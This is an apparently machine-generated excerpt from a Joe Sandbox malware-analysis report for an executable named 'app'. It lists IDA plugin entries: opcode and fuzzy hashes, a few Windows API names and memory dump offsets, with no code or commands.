                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: InfoLocale
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                              • Opcode ID: aec6594c86302d122d4f71fb4d9b161a13d7bbfc32bbdc78518e23443962e317
                                                                                                                                              • Instruction ID: e85e805a3fba895054420c9dab990c78e1ee1b5e14cd5d478966e3f2ece6382d
                                                                                                                                              • Opcode Fuzzy Hash: aec6594c86302d122d4f71fb4d9b161a13d7bbfc32bbdc78518e23443962e317
                                                                                                                                              • Instruction Fuzzy Hash: 30F03035A04208EBDB00DB71D946BDE77B9AF04318F504176F921DA1D0DB74EA459708
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0001B152), ref: 0041B19D
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: 90184e0bf99737bad7b3f49374a4ba74c04221f632f12a436ad7bc65f60bf99e
                                                                                                                                              • Instruction ID: 44c96ef74a1c1fbbfd07129883de79b675f03fbc3a68b556817faf6bab53d9ec
                                                                                                                                              • Opcode Fuzzy Hash: 90184e0bf99737bad7b3f49374a4ba74c04221f632f12a436ad7bc65f60bf99e
                                                                                                                                              • Instruction Fuzzy Hash: 05A012753012008747108F709C091403665E2016453814435A000C1311DB3040145589
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              APIs
                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 0041B1B1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                              • Opcode ID: abca96f171b0050d79f7799da41200dda6ac2e8c85e9cb135c27efb12445af08
                                                                                                                                              • Instruction ID: 1845281a5277d0a3e631376a96d3cbc5c82ed2965258bf50e72ab3e51ac72b24
                                                                                                                                              • Opcode Fuzzy Hash: abca96f171b0050d79f7799da41200dda6ac2e8c85e9cb135c27efb12445af08
                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: Invalid
                                                                                                                                              • API String ID: 0-874791708
                                                                                                                                              • Opcode ID: b659ca8c6e00dbab7138070e80762619299fd0e6f4ad1f276d95c0bedcc002dc
                                                                                                                                              • Instruction ID: 6e3b98ce8ae4565e51baa48762cae59fc137ac0ca859a760f5028aa8a09b957b
                                                                                                                                              • Opcode Fuzzy Hash: b659ca8c6e00dbab7138070e80762619299fd0e6f4ad1f276d95c0bedcc002dc
                                                                                                                                              • Instruction Fuzzy Hash: 09914F71A043019FD718CF29C49066ABBE6BFC8314F14C6ADE45ADB691DB31E846CF86
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 49ea5447d0855135be658535b3d383872752d319a27ff9739b2d70c6a8c7ad55
                                                                                                                                              • Instruction ID: 1f32112f5d1d97fa5f5208333258e9b5d7bed76fe60824153b00f1bbb4c0fe1f
                                                                                                                                              • Opcode Fuzzy Hash: 49ea5447d0855135be658535b3d383872752d319a27ff9739b2d70c6a8c7ad55
                                                                                                                                              • Instruction Fuzzy Hash: B9529F36B4060A9BEB0CCE9ACCD15DCB7A3ABC835471DC23CD915D7745DAB8A907CA90
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b1a7cd4ad4237f66a7f5b479c8a9d6e5fe355ec74f0ac4fcd0080180acf3cb83
                                                                                                                                              • Instruction ID: 48c69dfcf81588823c214f31e196cb8dfc36c04a85493f5a62082bf305e22e04
                                                                                                                                              • Opcode Fuzzy Hash: b1a7cd4ad4237f66a7f5b479c8a9d6e5fe355ec74f0ac4fcd0080180acf3cb83
                                                                                                                                              • Instruction Fuzzy Hash: 66324361D69F011DDB279535D822339A64DBFB33C4F19EB27E81AB2A99EF29D0C34104
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b497888ff59478dcbc58287f06f310b8c6890e4d9cc07b4980c569479dfc9433
                                                                                                                                              • Instruction ID: 647ce0f78b06017cf660a0f23f26868c8a6fa8cab28443e38f1770b9ff9b5a24
                                                                                                                                              • Opcode Fuzzy Hash: b497888ff59478dcbc58287f06f310b8c6890e4d9cc07b4980c569479dfc9433
                                                                                                                                              • Instruction Fuzzy Hash: CCE1AC70700625EBDB14DF15E880ABE77A9EF48304F91801BF816DB252DB3DDA01EB69
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b172e2b0bcc3e4b70a5f746494a3de25a59c6e33974ff90734639386dca649a6
                                                                                                                                              • Instruction ID: 38452df248bf53abee5655b8306aeabdc0ec6d6b7da8aebdf4c000082fc220b6
                                                                                                                                              • Opcode Fuzzy Hash: b172e2b0bcc3e4b70a5f746494a3de25a59c6e33974ff90734639386dca649a6
                                                                                                                                              • Instruction Fuzzy Hash: 3A916562F443143AF631A9B74D4FF6B6D9CCB86B94F01093EB648BA1C3E4F99D0481A5
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6059d0d72ec0c334f3be18ddc565dea93af22ea22949ed55b3ca8cd2e70e0d3c
                                                                                                                                              • Instruction ID: c3973503fe050827e959dac97388729fb7cbdc1d4b26a23f9ad82fba61604538
                                                                                                                                              • Opcode Fuzzy Hash: 6059d0d72ec0c334f3be18ddc565dea93af22ea22949ed55b3ca8cd2e70e0d3c
                                                                                                                                              • Instruction Fuzzy Hash: ECD1E47160C3818FD7258FA4D0B4B7ABFE2BFD6204F69485EE4C547242E775888ACB06
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 928e56e57a48a481a7910e8e9d35efa608cd7d846a12f7b1813392c24604a220
                                                                                                                                              • Instruction ID: 8c976a428b59b3ae0ebb38614f34ffe00415377cb4a8672460f2c7db1d41e954
                                                                                                                                              • Opcode Fuzzy Hash: 928e56e57a48a481a7910e8e9d35efa608cd7d846a12f7b1813392c24604a220
                                                                                                                                              • Instruction Fuzzy Hash: AAB16B3590020ADFDB15CF04C5D0AE9BBA1BF58318F14C1AED81A5B342DB35EE86CB94
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b11c29d731a3fe359ff3c8960c25e70cf1d6ef21bad3e438abc49f0186303c47
                                                                                                                                              • Instruction ID: c65f4db1ee1ab5aea9874099a5b32825c7925b74f3c3ddba256538461b66e313
                                                                                                                                              • Opcode Fuzzy Hash: b11c29d731a3fe359ff3c8960c25e70cf1d6ef21bad3e438abc49f0186303c47
                                                                                                                                              • Instruction Fuzzy Hash: 8B719F32F287414BD71A4A3D98122F6BA96AFD6185F59D73BF849F77C1FB3488024248
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b99048aadc9108a7a47e8d757a13be714c2c91adfe30a4968028326f1f6aabb
                                                                                                                                              • Instruction ID: d94da61a4d33c70127931096d79afcb62bb82fddacdbbb9f7af1e86fbf498934
                                                                                                                                              • Opcode Fuzzy Hash: 5b99048aadc9108a7a47e8d757a13be714c2c91adfe30a4968028326f1f6aabb
                                                                                                                                              • Instruction Fuzzy Hash: F571E4727183154BD7088E2DCC9032EB7D6ABC8764F1A8A3DE8A9D73D1E674CC058B85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5b4242db804f160874d45c6eac3e819e203fa8982cc2c38a369c0292fe220eb0
                                                                                                                                              • Instruction ID: b0cb0d300f20ddebd6507bc7e18408973e55d3e3f069e74c3814ee5996f79b5a
                                                                                                                                              • Opcode Fuzzy Hash: 5b4242db804f160874d45c6eac3e819e203fa8982cc2c38a369c0292fe220eb0
                                                                                                                                              • Instruction Fuzzy Hash: 2A810231B14346AFD718CE58C4A433ABBD2BBC5B14F0986ADD99A5B385DF309C09CB85
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 998677bf26be223f5bce6a2b86f89a1f9df7ccf45b26c7b66d4fc4a99f3cffc7
                                                                                                                                              • Instruction ID: 5f878920901a51bff63f9c7ce6f56e1e90bafd3fa833b8bdd1da0bb451fea022
                                                                                                                                              • Opcode Fuzzy Hash: 998677bf26be223f5bce6a2b86f89a1f9df7ccf45b26c7b66d4fc4a99f3cffc7
                                                                                                                                              • Instruction Fuzzy Hash: 39912C72A087019FD318CF6AC88035BF7E2AFC8710F1AC93EA599D7754DA74A8519B81
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 393c3d374bd8c63c777b2d7d9f932cb451af37f2bf3dfa0de7fa71c2bc9b16f8
                                                                                                                                              • Instruction ID: 95471746c90605396dad2cf56e1d5d2bcd93722991a68cd17ccbef0c61f3614b
                                                                                                                                              • Opcode Fuzzy Hash: 393c3d374bd8c63c777b2d7d9f932cb451af37f2bf3dfa0de7fa71c2bc9b16f8
                                                                                                                                              • Instruction Fuzzy Hash: 25418072A083104FC7149EAD889062AFBE5BBC8714F05892EF9D9C3341D774DC058B96
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                              • Opcode ID: 6e51c7faef0564102dc195f7525f9acbf82fac21e2be0411007f797b0e177185
                                                                                                                                              • Instruction ID: cbc79b06d30ae3dd921b1747c8e2c0c934cb6769d3ffcb5f6e52da2c15ba8a7b
                                                                                                                                              • Opcode Fuzzy Hash: 6e51c7faef0564102dc195f7525f9acbf82fac21e2be0411007f797b0e177185
                                                                                                                                              • Instruction Fuzzy Hash: 0B413771F006811BD7089E78D852366B7D6FBD8304F14963DE689C7780F7B4D8918B54
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2684363893.0000000002560000.00000040.00001000.00020000.00000000.sdmp, Offset: 02560000, based on PE: true
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_2560000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 30bc2c7a4d68d0212d6293902854fcbefbd6b1e392bebafcbc4498d0f6901e01
                                                                                                                                              • Instruction ID: 16b1ffe6904467bb76c4f94a5d9be491e8c56437dfc3a7d5ed9a65479a5f3b46
                                                                                                                                              • Opcode Fuzzy Hash: 30bc2c7a4d68d0212d6293902854fcbefbd6b1e392bebafcbc4498d0f6901e01
                                                                                                                                              • Instruction Fuzzy Hash: B9415A76A187159FD708DE29C89025FFBE2AFC8350F15CA2DE999D7351DA30D805CB82
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: fa6128884ea52e64c76ff3e3364ef09faa5366da33f3e04718ef87ad060ba4cb
                                                                                                                                              • Instruction ID: bea78ab49d568d8cc68ab5b9c56c3e372d34a610e398940364b997e8bf37097f
                                                                                                                                              • Opcode Fuzzy Hash: fa6128884ea52e64c76ff3e3364ef09faa5366da33f3e04718ef87ad060ba4cb
                                                                                                                                              • Instruction Fuzzy Hash: E331B873F5A3859EC305CA6884401D97F619B7A208B6CC6EED4445F383C2B79A07C766
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f8f59f7a406eb4b85d93dfd7fae9637fb6621cf33be82f32cec578064e2cccf9
                                                                                                                                              • Instruction ID: 5f762f80975287f2da4cc5c3f4db9215d90f79417d5e070c4ca66a264b4d2add
                                                                                                                                              • Opcode Fuzzy Hash: f8f59f7a406eb4b85d93dfd7fae9637fb6621cf33be82f32cec578064e2cccf9
                                                                                                                                              • Instruction Fuzzy Hash: 14313C35624B545FD750EE7688C0D3B77E9BB88B243400C2EE943D3691DABAF8014A65
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: ae75250db23d3f65a106ccb7db6d0b7db7673aad107e272ec9e65786d8c8dc3a
                                                                                                                                              • Instruction ID: a28aa33132646e52dc6174b08334311de5fd8f37993466fb3b074f5a633b62d4
                                                                                                                                              • Opcode Fuzzy Hash: ae75250db23d3f65a106ccb7db6d0b7db7673aad107e272ec9e65786d8c8dc3a
                                                                                                                                              • Instruction Fuzzy Hash: 74313C35624B545FD750EE7688C0D3B77E9BB88B243400C2EE943D3691DABAF8014A55
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 80dc16c4b31a12e895f4eb3d02c2bf18cd06df24083ebb6c5dcc11986d386e4b
                                                                                                                                              • Instruction ID: 9fae89fed201fb87603fd6b142b5de75446cc31e3fa449c8e06de045bb1d32cf
                                                                                                                                              • Opcode Fuzzy Hash: 80dc16c4b31a12e895f4eb3d02c2bf18cd06df24083ebb6c5dcc11986d386e4b
                                                                                                                                              • Instruction Fuzzy Hash: D4214AB1D04609AEEB24CF5AD8405AEFBF4FF84360F20462FE455B7291D7395A02CB68
                                                                                                                                              Uniqueness

                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2682301916.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2682260278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682362933.000000000042C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682415282.000000000042D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682449786.000000000042F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682510659.0000000000442000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682547309.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2682613339.000000000047A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_app.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 471361ffd1135b2c1fce0387e3c50f122f3eba086dcd4d0d050b43a0f3504bdb
                                                                                                                                              • Instruction ID: 2a7c390b1601eb7402f742876ed82ff69b70e3e7b876b19d7b158a76fac5e0c4
                                                                                                                                              • Opcode Fuzzy Hash: 471361ffd1135b2c1fce0387e3c50f122f3eba086dcd4d0d050b43a0f3504bdb
                                                                                                                                              • Instruction Fuzzy Hash: 09212D72B146489FC740CF69C48079ABBF1AF8A358B6985AAC454AF383D276D907CF50
                                                                                                                                              Uniqueness

